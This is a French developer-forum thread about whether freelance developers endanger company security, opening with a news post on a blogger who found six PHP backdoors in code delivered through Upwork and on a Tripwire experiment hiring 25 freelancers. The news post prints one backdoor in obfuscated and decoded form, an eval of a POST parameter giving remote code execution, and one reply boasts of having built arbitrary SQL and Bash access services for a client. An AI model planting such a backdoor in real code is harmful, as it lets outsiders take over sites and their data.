IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Affichage des résultats du sondage: Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ?

Votants
60. Vous ne pouvez pas participer à ce sondage.
  • Oui, je suis de cet avis

    11 18,33%
  • Non, après tout un dev est un dev, qu'il soit interne ou pas

    26 43,33%
  • Cela dépend de plusieurs paramètres

    22 36,67%
  • je n'ai pas d'avis sur la question

    1 1,67%
Emploi Discussion :

Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ?


Sujet :

Emploi

Vue hybride

Message précédent Message précédent   Message suivant Message suivant
  1. #1
    Chroniqueur Actualités

    Homme Profil pro
    Administrateur de base de données
    Inscrit en
    Mars 2013
    Messages
    9 531
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Canada

    Informations professionnelles :
    Activité : Administrateur de base de données

    Informations forums :
    Inscription : Mars 2013
    Messages : 9 531
    Par défaut Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ?
    Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ?
    Oui, selon une étude

    Les travailleurs indépendants se sont révélés être une ressource extrêmement utile pour de nombreuses petites entreprises au cours des dernières années, ce qui permet de recruter des compétences spécialisées au besoin. D’ailleurs même les grandes enseignes de la technologie, à l’instar de la NASA ou de Google, ont déjà eu recours à l'externalisation des services informatiques.

    Cependant, Robert Hansen, un spécialiste du mobile, a décrit une mauvaise expérience qu’il a eue en juin 2016 lorsqu’il devait externaliser la mise à jour de son blog Smartphone Exec. Il est passé par la plateforme américaine de freelance Upwork.

    « Durant la première semaine, les choses se sont bien déroulées. Une communication régulière et des délais clairs sont importants. Mais ce développeur particulier avait quelques tours dans ses manches. Tout d'abord, le compte dont il se servait était un front pour une équipe de développement plus grande. Cette équipe de développement n'était pas disposée à utiliser la fonction Upwork intégrée pour effectuer le suivi du travail dans le temps », a-t-il expliqué.

    Pour rappel, Upwork se sert d’une application pour permettre au client de suivre l’évolution du travail qu’il a commandé dans le temps : l’application se charge alors d’apporter aux clients divers éléments (capture d’écran, photo prise par la webcam du travailleur indépendant – si celui-ci l’autorise –, etc.) qui seront alors situés dans une chronologie que le client pourra parcourir à sa guise. Le fait que le développeur, ainsi que l’équipe avec laquelle il travaille, refuse de se servir de cette application a été pour Hansen « Le premier signe que quelque chose allait de travers. »

    « En second lieu, il a fallu 40 heures pour conditionner le code pour la livraison - quelque chose qui aurait dû être extrêmement simple à faire si le code était effectivement développé de manière professionnelle. Mais le dernier problème était le plus lourd », a-t-il continué.

    « Lorsque le code m’a été livré, il était dans un format que l’iPhone ne peut pas gérer facilement – les fichiers zip. J'ai donc brisé ma règle et l'ai téléchargée dans un ordinateur et avant même de pouvoir le décompresser, Microsoft Security Essentials a trouvé quelque chose qui lui semblait suspect. J'ai donc creusé dans le code et j'ai trouvé six portes dérobées PHP qui permettraient à ce développeur et à leur équipe d'accéder à ce site. »

    Voici un exemple de ce à quoi ressemblait le code avant la décompression :

    Code PHP : Sélectionner tout - Visualiser dans une fenêtre à part
    <?PHP $viu0="sutpe_or"$iwvk7=$viu0[0].$viu0[2].$viu0[7].$viu0[2].$viu0[6].$viu0[1].$viu0[3].$viu0[3].$viu0[4].$viu0[7]$uvwh73=$iwvk7 ($viu0[5].$viu0[3].$viu0[6].$viu0[0].$viu0[2]); if(isset(${$uvwh73}['q490ded'])){eval( ${$uvwh73}['q490ded']);} ?>

    Après la décompression, il ressemblait à ceci :

    Code PHP : Sélectionner tout - Visualiser dans une fenêtre à part
    <?PHP if(isset(${_POST}['q490ded'])){eval(${_POST}['q490ded']);} ?>


    « Fondamentalement, ce que cela dit, c'est que chaque fois que leur équipe irait sur mon site Web et ferait une demande POST sur mon site avec le paramètre ci-dessus, ils auraient pu exécuter n'importe quelle commande, comme s’ils avaient le même niveau d'accès que j'avais. »

    Suite à cette situation, l’entreprise de sécurité Tripwire s’est intéressée à la question de savoir si, lorsqu’un client (entreprise ou particulier) fait appel à ce genre de travailleurs, en particulier pour des projets informatiques, cela pourrait compromettre la sécurité de l’entreprise. Pour savoir à quel point ce problème peut être répandu, l’entreprise a eu l’idée de mener une expérience auprès de 25 développeurs indépendants.

    L’équipe VERT (Vulnerability and Exposure Research Team) de Tripwire a envoyé un courrier à l’ensemble des candidats avec le même projet, la création d’un site web avec différentes fonctionnalités : « Le plan était simple: créer un personnage non technique et, en tant que tel, embaucher un certain nombre de travailleurs indépendants pour créer un site web. Chaque entrepreneur a reçu le même courrier électronique avec les mêmes critères. »

    Bien que l'équipe ne savait pas à quoi s'attendre, elle avait une série d'objectifs à l'esprit. Tout d'abord, elle voulait analyser les interactions avec les entrepreneurs. Comment était la communication ? Ont-ils tenté d'arnaquer le client ou le marché ? Combien accepteraient le travail, et combien le refuseraient ou tenteraient d'augmenter les enchères ?

    Autant de questions que l’équipe a trouvé intéressantes même si, finalement, elle s’est fixé deux objectifs principaux :

    tout d'abord, elle voulait identifier les portes dérobées, les mots de passe codés et les actions intentionnellement malveillantes prises par les entrepreneurs ;
    ensuite, elle voulait trouver tous les défauts et les vulnérabilités dans le code livré.

    25 développeurs ont répondu à l’appel de cette offre proposée à 250 dollars. Plusieurs ont sollicité une communication et un paiement hors de la plateforme, probablement pour éviter de payer la commission à Upwork, ce qui a conduit à la fermeture immédiate de leur compte pour violations de conditions et services. D’autres ont été exclus, car ils demandaient un montant plus élevé que le budget proposé.


    Craig Young, chercheur principal en sécurité chez Tripwire

    Cependant, 17 développeurs ont réussi à passer entre les mailles du filet. Ils ont mis entre 7 et 9 jours pour livrer leur client. Pendant le développement du projet, VERT a dû mettre fin à certains contrats pour plusieurs raisons, notamment :

    1. L'entrepreneur a fourni une installation WordPress de base sans assistance pour les utilisateurs du site afin qu’ils puissent télécharger des documents. Le contractant a refusé de fournir un remboursement et a réclamé faussement (six fois) que le travail ait été effectué selon les spécifications du client. Le support à la clientèle devait être invoqué pour forcer un remboursement ;
    2. L'entrepreneur a fourni des fichiers initiaux et a ensuite demandé d'annuler la commande parce qu'il « était occupé » quelques jours après le projet ;
    3. L'entrepreneur a demandé plus d'argent immédiatement après avoir accepté le contrat. Il a évoqué un malentendu, prétendant avoir cru que le projet était de mettre à jour un site existant plutôt que d’en créer un nouveau ;
    4. L'entrepreneur a régulièrement fourni des liens vers un site Web WordPress avec des problèmes de configuration qui ont conduit à des pages d’erreur. Deux semaines après la date limite, ils ont convenu de fournir un remboursement ;
    5. L'entrepreneur a demandé l'URL du panneau de contrôle du site et a indiqué qu'il était difficile de créer un site sans cela. Le contrat a été annulé parce qu'ils ont déclaré par la suite qu’il faudrait 20 à 25 jours plutôt que les sept jours convenus, et que le prix aurait besoin d’être renégocié ;
    6. L'entrepreneur a fourni un modèle de page HTML + JS et n'a pas pu fournir le jeu complet de fonctionnalités ;
    7. L'entrepreneur n'a pas été en mesure de fournir des produits livrables après trois semaines.

    « S'il s'agissait d'un projet du monde réel, ces conflits constitueraient un problème sérieux, qui entraînerait un dépassement du budget alloué au projet ou un dépassement de la date limite », a indiqué VERT. Et de préciser qu’en plus de cela, « le client aurait eu un site Web instable. »

    À la fin, seuls 10 des 17 projets commandés ont été achevés et payés, a indiqué VERT.

    Craig Young, chercheur principal en sécurité chez Tripwire, a affirmé que « Nous ne pouvons raisonnablement pas nous attendre à ce que les violations des données diminuent si les sites Web conçus par les développeurs ne sont pas réalisés avec des mesures de sécurité de base intégrées ».

    Afin de ne pas être victime des mêmes défauts, Tripwire conseille aux entreprises qui recherchent un nouveau site Web ou d'autres projets connexes d'être plus pointues dans le processus de recrutement, surtout lorsqu'ils envisagent de prendre des entrepreneurs dans des fuseaux horaires différents des leurs.

    L'entreprise recommande également d'analyser tous les projets finis avec un scanner de vulnérabilité d'application Web et, idéalement, chercher à obtenir une évaluation par un testeur de pénétration professionnel avant que le paiement final ne soit effectué.

    Source : Smartphone Exec, TripWire

    Et vous ?

    Avez-vous déjà trouvé ou posé des backdoors dans du code ?
    Contribuez au club : Corrections, suggestions, critiques, ... : Contactez le service news et Rédigez des actualités

  2. #2
    Membre très actif
    Homme Profil pro
    Développeur informatique
    Inscrit en
    Février 2016
    Messages
    225
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : Février 2016
    Messages : 225
    Par défaut
    a aucun moment le donneur d’ordre ne se remet en question en disant, en fait, je demande un dev pour 250$, ptet que c'est une offre de merde qui n'attirera que les mouches à merde ... ?

    Clairement, le type n'est tombé que sur de mauvais prestataires, le pire étant l'exemple mis en focus, puisque clairement le fournisseur de service a travailler dans l'intention de détourner la demande du client.

    Encore fois, belle mise en généralité d'un phénomène qui reste marginal puisque bon tout cela ne représente que 26 tentatives....

    Par ailleurs, combien de société presta de service informatique refile du magento ou wordpress sans maintenance ?
    Ou simplement fournit sans les derniers patchs à jour.

  3. #3
    Expert confirmé

    Homme Profil pro
    Directeur des systèmes d'information
    Inscrit en
    Avril 2002
    Messages
    2 892
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 65
    Localisation : Luxembourg

    Informations professionnelles :
    Activité : Directeur des systèmes d'information
    Secteur : Finance

    Informations forums :
    Inscription : Avril 2002
    Messages : 2 892
    Par défaut
    Citation Envoyé par mh-cbon Voir le message
    a aucun moment le donneur d’ordre ne se remet en question en disant, en fait, je demande un dev pour 250$, ptet que c'est une offre de merde qui n'attirera que les mouches à merde ... ?
    Si tu va sur les sites de freelances/missions tu verra que pourtant c'est courant.
    C'est donc pertinent que les clients comprennent non seulement qu'ils demandent trop avec des budgets trop bas mais que d'autre part il y à des risques...


    Citation Envoyé par mh-cbon Voir le message
    alors que clairement, le type n'est tombé que sur de mauvais prestataires, le pire étant l'exemple mis en focus, puisque clairement le fournisseur de service a travailler dans l'intention de détourner la demande du client. Encore fois, belle mise en généralité d'un phénomène qui reste marginal puisque bon tout cela ne représente que 26 tentatives....
    "Marginal" c'est vite dit, la cybercriminalité est en très forte croissance... et il suffit d'une fois, les conséquences peuvent êtres désastreuses, cela peu mener au dépôt de bilan d'une société et donc du chômage pour tous les employés, sans parler des clients lésés...
    Si tu étais client tu saurais que les "mauvais prestataires" sont légions à ce tarif la.

    C'est donc très important d'attirer l'attention des clients sur ces questions...

    Si les clients étaient mieux sensibilisés, il feraient plus attention à payer des prestations plus chères avec des prestataires de qualité et non à commander n'importe quoi à n’importe qui.

    Du coup ça rends cette news en encore plus le débat qui s'ensuit très important, la question mérite tout à fait d'être posée...

  4. #4
    Membre très actif
    Homme Profil pro
    Développeur informatique
    Inscrit en
    Février 2016
    Messages
    225
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Seine Saint Denis (Île de France)

    Informations professionnelles :
    Activité : Développeur informatique

    Informations forums :
    Inscription : Février 2016
    Messages : 225
    Par défaut
    C'est donc pertinent que les clients comprennent non seulement qu'ils demandent trop avec des budgets trop bas mais que que d'autre part il y à des risques...
    J'objecterais simplement que nous ne sommes pas les dits-clients, donc cette news à définitivement un souci, selon moi.

    Ce qui n'enlève pas l'idée, comme vous le soulignez, que la question mérite d'être posée, mais ni la forme ni le contenu ne me conviennent ici.

    Bon après marginal, pas marginal, effectivement, je n'ai jamais demandé à quelqu'un d'autre de faire mon taff xd
    Mais bon sur quels chiffres s'appuyer autres que ceux de la news, et partant de là, en venir à la conclusion d'une généralité malvenue ?

  5. #5
    Expert confirmé

    Homme Profil pro
    Directeur des systèmes d'information
    Inscrit en
    Avril 2002
    Messages
    2 892
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 65
    Localisation : Luxembourg

    Informations professionnelles :
    Activité : Directeur des systèmes d'information
    Secteur : Finance

    Informations forums :
    Inscription : Avril 2002
    Messages : 2 892
    Par défaut
    Il y à un point d'interrogation, c'est une question, pas une affirmation.
    Pour moi la question est pertinente, et la news aussi, après l'étude qui sert de base à la news a un impact forcément limité mais il faut bien partir de quelque chose, et justement c'est intéressant de voir dans le fil si d'autres ont eu des expériences sur ce sujet...

    Et détrompe-toi, il y à aussi des "clients" sur ce site, et des directions informatique qui font appel à des prestataires, il y à des millions de lecteurs pour info : Le Club developpez.com, c'est jusqu'à 4 millions de visiteurs uniques.
    Je connais énormément de DI/DSI ou même simplement des gérants d'entreprise qui consultent developpez.com...

  6. #6
    Inactif  

    Homme Profil pro
    Freelance EURL / Business Intelligence ETL
    Inscrit en
    Avril 2005
    Messages
    5 878
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Freelance EURL / Business Intelligence ETL
    Secteur : Finance

    Informations forums :
    Inscription : Avril 2005
    Messages : 5 878
    Billets dans le blog
    3
    Par défaut
    Le titre stigmatise les indépendants, mais l'article évoque plus la prestation à l'extérieur. Indépendant comme cabinets de consulting, de 2 à 100 000 personnes, peuvent essayer d'entuber le client - à juste titre, car dans ma prime jeunesse, je louais une loyauté sans faille à ma SSII - bonjour ma naïeveté - et me méfiait dur comme fer des indépendants, le premier que j'ai rencontré étant un fieffé filou (jour facturé alors qu'il était absent, cinq jours-homme de travail alors qu'il a rendu un fichier SQL avec une vieille instruction... il avait même tenté de faire facturer une page de code que j'avais moi-même développée). Combien de commerciaux, à la belle époque, ont traficoté pour augmenter la facturation d'un consultant ? Combien ont mis fin au contrat à peine commencé parce qu'ils ont trouvé mieux facturé ailleurs ? Et combien ont trouvé des raisons fallacieuses alors que le consultant est parti ?

    Le débat est intéressant, pourvu qu'il ne se penche pas non plus que sur les professionnels en IT. Je suis sûr qu'on peut trouver le même exemple en marketing, en coaching ou autre, ou le prestataire finit par demander plus ou court-circuite sous le manteau son intermédiaire - qu'il le court-circuite "proprement" est une chose, qu'il le fasse de manière détournée dès le début en dit très long sur son professionnalisme.

    J'ai bossé pour une société de service qui devait développer en Java, et qui a fini au bout de deux mois par présenter une première mouture, un peu en mode POC en... PHP ! Le (gros) client, qui a une infrastructure IT, ne s'est évidemment pas laissé faire. La société de service a juste argué que c'était plus performant et moins lourd, avant de revenir sur du Java comme prévu. Et ce n'était pas une société de 5 quidams, mais une branche d'une bonne soixantaine de personnes qui devaient travailler dessus (pas que des devs, hein, des DBA, chef de projet, développeurs reporting, architecture, etc.)

    Je ne vois pas trop la question initiale de VERT ("est-ce qu'un consultant en extérieur mais en danger la sécurité de mon entreprise") avec celle de la revalorisation des coûts...
    - So.... what exactly is preventing us from doing this?
    - Geometry.
    - Just ignore it !!
    ****
    "The longer he lived, the more he realized that nothing was simple and little was true" A clash of Kings, George R. R. Martin.
    ***
    Quand arrivera l'apocalypse, il restera deux types d'entreprise : les pompes funèbres et les cabinets d'audit. - zecreator, 21/05/2019

  7. #7
    Membre confirmé

    Homme Profil pro
    Développeur Web
    Inscrit en
    Février 2013
    Messages
    88
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Février 2013
    Messages : 88
    Billets dans le blog
    1
    Par défaut
    Citation Envoyé par Stéphane le calme Voir le message
    Avez-vous déjà trouvé ou posé des backdoors dans du code ?
    Aller, juste pour alimenter les légendes des développeurs voyous : Oui !

    Mes backdoors étaient carrément des services clairement exposés me permettant de jouer du code SQL ou Bash arbitraire sur l'environnement de mon choix.

    Booouh le méchant développeur ! Sauf que ce dernier n'a fait que son travail et a obéis au chef de projet client qui a un passé de développeur. Au lieu d'investir sur des logs décentralisées et un minimum test sur le workflow, préférait faire du support avec SoapUI.

  8. #8
    Inactif  

    Homme Profil pro
    NR
    Inscrit en
    Juin 2013
    Messages
    3 715
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Suisse

    Informations professionnelles :
    Activité : NR
    Secteur : Aéronautique - Marine - Espace - Armement

    Informations forums :
    Inscription : Juin 2013
    Messages : 3 715
    Billets dans le blog
    9
    Par défaut
    comme mh-cbon, 250$ pour un projet de 7 (ou 9 ) jours sérieusement ???
    si 1$=1€, c'est moins que le smic en france, et le pire c'est que le $>€ et que les salaires sont plus élevée aux states

    et puis wordpress quoi... chez pas je trouve que sa sonne très mal avec "chercheur principal en sécurité".
    la création d’un site web
    Justement, aucune entreprise sérieuse ne fait un site web avec wordpress...

  9. #9
    Membre très actif
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Août 2014
    Messages
    476
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 56
    Localisation : France, Ain (Rhône Alpes)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Août 2014
    Messages : 476
    Par défaut
    Citation Envoyé par RyzenOC Voir le message
    Justement, aucune entreprise sérieuse ne fait un site web avec wordpress...
    ouep mais entre des devps qui ne penseront pas a tout et un CMS qui a deja pas mal de choses intégrées et testées y a pas photo.
    Sans compter les capacités a reagir vite fait sur un pb (technique/securité etc) qui sont sans commune mesure sur un CMS largement diffusé.

    C'est le propre du developpeur de se croire toujours meilleur que ce qui existe sur le marché et reinventer la roue carré (ce que font les autres c'est de la merde). J'ai tendance a croire qu'une communauté de developpeurs qui pond un CMS sont d'un niveau technique au moins >= a n'importe quel developpeur.
    Donc avant de cracher sur ce que font les autres faut balayer devant sa porte. J'ai vu passer plethore de dev dans ma boite (chacun plus malin que les autres) pour refaire a sa façon parce que c'etait l'etat de l'art (enfin sa comprehension), pour au final nous plomber des projets entiers (failles de securité, etc).

    Alors depuis j'ai personnellement bien revu mes opinions concernant les CMS qui dans bien des cas (meme pour des applis d'entreprises) seraient largement suffisant et plus efficaces/fiables que celles developpées de 0 avec les dernieres technos et langages (non maitrisées bien sur, c'est le propre du dev de faire joujou avec les technos). Et ce n'est pas un cliché, juste une constatation personnelles sur 25 ans dans l'entreprise et la multitude de projets (applis entreprise/leger/lourd/mobile etc).

    Avec du recul e me dis que l'evolution de l'informatique si c'etait logique ce serait que le dev soit fait presque automatiquement plutot que de tout reinventer (reecrire dans nouveau langage/nouvelle techno qui n'apporte pas grand chose). En 2017 on ne fait pas mieux les choses qu'en 1990; differemment assurement mais avec une complexité qui s'est accrue, une fiabilité pas meilleurs pour autant (malgré des outils de devpts efficaces ou methode revolutionnaire).

  10. #10
    Membre très actif
    Profil pro
    Inscrit en
    Décembre 2006
    Messages
    614
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2006
    Messages : 614
    Par défaut
    Citation Envoyé par kilroyFR Voir le message
    C'est le propre du developpeur de se croire toujours meilleur que ce qui existe sur le marché et reinventer la roue carré
    Ça porte déjà le nom du syndrome NIH (Not Invented Here) et de l'habitude du dev à réparer ce qui marche… 😇

  11. #11
    Membre très actif
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Août 2014
    Messages
    476
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 56
    Localisation : France, Ain (Rhône Alpes)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Août 2014
    Messages : 476
    Par défaut
    Citation Envoyé par martopioche Voir le message
    Ça porte déjà le nom du syndrome NIH (Not Invented Here) et de l'habitude du dev à réparer ce qui marche… 😇
    lol
    Un petit coup de refactoring, simplification, et hop y a plus rien qui marche. Je connais ca je le vois tous les jours sur des devp plus malins que les autres.

  12. #12
    Membre confirmé
    Profil pro
    Inscrit en
    Décembre 2004
    Messages
    53
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2004
    Messages : 53
    Par défaut
    Si c'est correctement testé dans une suite de tests, nul ne devrait avoir peur d'un refactoring ou d'une simplification

  13. #13
    Membre averti
    Inscrit en
    Avril 2011
    Messages
    32
    Détails du profil
    Informations forums :
    Inscription : Avril 2011
    Messages : 32
    Par défaut
    Citation Envoyé par RyzenOC Voir le message
    comme mh-cbon, 250$ pour un projet de 7 (ou 9 ) jours sérieusement ???
    si 1$=1€, c'est moins que le smic en france, et le pire c'est que le $>€ et que les salaires sont plus élevée aux states

    et puis wordpress quoi... chez pas je trouve que sa sonne très mal avec "chercheur principal en sécurité".

    Justement, aucune entreprise sérieuse ne fait un site web avec wordpress...
    Euh si... Faut pas déconner. Si tu sais cadrer ton projet Wordpress est parfait pour faire de petits sites vitrines.

  14. #14
    Inactif  

    Homme Profil pro
    NR
    Inscrit en
    Juin 2013
    Messages
    3 715
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Suisse

    Informations professionnelles :
    Activité : NR
    Secteur : Aéronautique - Marine - Espace - Armement

    Informations forums :
    Inscription : Juin 2013
    Messages : 3 715
    Billets dans le blog
    9
    Par défaut
    Citation Envoyé par zatura Voir le message
    Euh si... Faut pas déconner. Si tu sais cadrer ton projet Wordpress est parfait pour faire de petits sites vitrines.
    oui comme tu le dis : Wordpress est parfait pour faire de petits sites vitrines.

    Mais jamais pour faire le site de l'entreprise, ou une plateforme web. Pourtant pleins le fond...
    Quand je parle d'entreprise, je parle évidement pas de la boulangerie au coin de la rue

  15. #15
    Membre averti
    Inscrit en
    Avril 2011
    Messages
    32
    Détails du profil
    Informations forums :
    Inscription : Avril 2011
    Messages : 32
    Par défaut
    Citation Envoyé par RyzenOC Voir le message
    oui comme tu le dis : Wordpress est parfait pour faire de petits sites vitrines.

    Mais jamais pour faire le site de l'entreprise, ou une plateforme web. Pourtant pleins le fond...
    Quand je parle d'entreprise, je parle évidement pas de la boulangerie au coin de la rue
    Ouai ouai t'iras dire ça à nos clients grand compte qui DEMANDENT des CMS comme Drupal ou Wordpress

  16. #16
    Inactif  

    Homme Profil pro
    NR
    Inscrit en
    Juin 2013
    Messages
    3 715
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Suisse

    Informations professionnelles :
    Activité : NR
    Secteur : Aéronautique - Marine - Espace - Armement

    Informations forums :
    Inscription : Juin 2013
    Messages : 3 715
    Billets dans le blog
    9
    Par défaut
    Citation Envoyé par zatura Voir le message
    Ouai ouai t'iras dire ça à nos clients grand compte qui DEMANDENT des CMS comme Drupal ou Wordpress
    oui je leurs dirais quand leur site se sera fait défiguré, ou bien leurs BDD se sera fait volé.
    Sa vas être la joie à ce moment dans la boite.

    Et plus tard on découvrira que la faille venait d'une extension plus maintenue depuis 6mois ou bien parce que wordpress n'est plus à jour depuis 1ans

  17. #17
    Membre confirmé
    Profil pro
    Inscrit en
    Juin 2006
    Messages
    162
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2006
    Messages : 162
    Par défaut
    @RyzenOC : Non 7 - 9 jours c'était le délai accordé pour fournir le travail, au vue des réponses il ne devait pas y avoir bien plus de 1 à 2 jours de boulot.

    Mais clairement le mec a fait une mauvaise expérience et généralise, ensuite pour leur «test» il faudrait voir ce qu'ils proposaient exactement et le profil de ceux qui répondaient, si c'était de dev autoproclamé ou non. Mais c'est clair qu'un projet à 250$ ne va pas attirer la fine fleur des devs

  18. #18
    Membre extrêmement actif
    Homme Profil pro
    Inscrit en
    Janvier 2014
    Messages
    1 646
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations forums :
    Inscription : Janvier 2014
    Messages : 1 646
    Par défaut
    Tu as même des sites de services "tout à 5 $" et il y à des prestataires de dev et des webmasters la dedans !
    Un site ou un dev pour 5 $ ? vraiment ?

  19. #19
    Rédacteur
    Avatar de thierryler
    Homme Profil pro
    Inscrit en
    Octobre 2007
    Messages
    4 078
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations forums :
    Inscription : Octobre 2007
    Messages : 4 078
    Par défaut
    Par bien compris si c'est un forfait de 7 jours à 250$ ou 250$/jour sur 7 jours (ie. 1750$) ???
    Thierry Leriche-Dessirier
    Consultant Java JEE Web Agile freelance
    Rédacteur pour Developpez
    Professeur de Génie Logiciel à l'ESIEA

    Site : http://www.icauda.com / Linked'in : http://www.linkedin.com/in/thierryler / Twitter : @ThierryLeriche

  20. #20
    Membre actif
    Profil pro
    Intégrateur
    Inscrit en
    Décembre 2008
    Messages
    111
    Détails du profil
    Informations personnelles :
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : Intégrateur
    Secteur : High Tech - Produits et services télécom et Internet

    Informations forums :
    Inscription : Décembre 2008
    Messages : 111
    Par défaut Un menuisier doit arrêter de parler de chirurgie
    Alors, le client veux le beur, l'argent du beur, la fille du crémier, la vache à lait, et l'écurie tant qu'on y est pour 250$ 9 jours de dev !!!

    250$/9 = 27,8$ par jour, on va rester sur une journée classique de 8h, ce qui fait 3,4$ par heure, clairement faire la manche rapporterai plus je pense qu'en dite vous ???

    comment ces fourbes espère trouver un développeur de qualité dans ces conditions ? on ne peux tomber que sur des escroc qui ne sont absolument pas intéressée par une exploitation de données que la misère que paye ces misérable, et encore, le site prend une commission, c'est pathétique

    Essayer de casser les tarif de la même manière dans d'autre profession et vous verrez les dégâts

Discussions similaires

  1. Forums d’entraide : les développeurs professionnels sont-ils trop fiers pour aider les débutants ?
    Par Michael Guilloux dans le forum Débats sur le développement - Le Best Of
    Réponses: 108
    Dernier message: 17/01/2020, 20h05
  2. Les développeurs âgés sont-ils bons pour le garage ?
    Par Cedric Chevalier dans le forum Actualités
    Réponses: 136
    Dernier message: 29/12/2017, 09h10
  3. Des nouvelles du programme de Microsoft pour les développeurs indépendants sur Xbox One
    Par LittleWhite dans le forum Développement 2D, 3D et Jeux
    Réponses: 3
    Dernier message: 21/08/2013, 19h19
  4. Réponses: 46
    Dernier message: 12/05/2012, 09h56
  5. Virtualiser les serveurs, est-ce un risque pour la sécurité des données ?
    Par Jean-Philippe Dubé dans le forum Actualités
    Réponses: 3
    Dernier message: 03/06/2009, 15h00

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo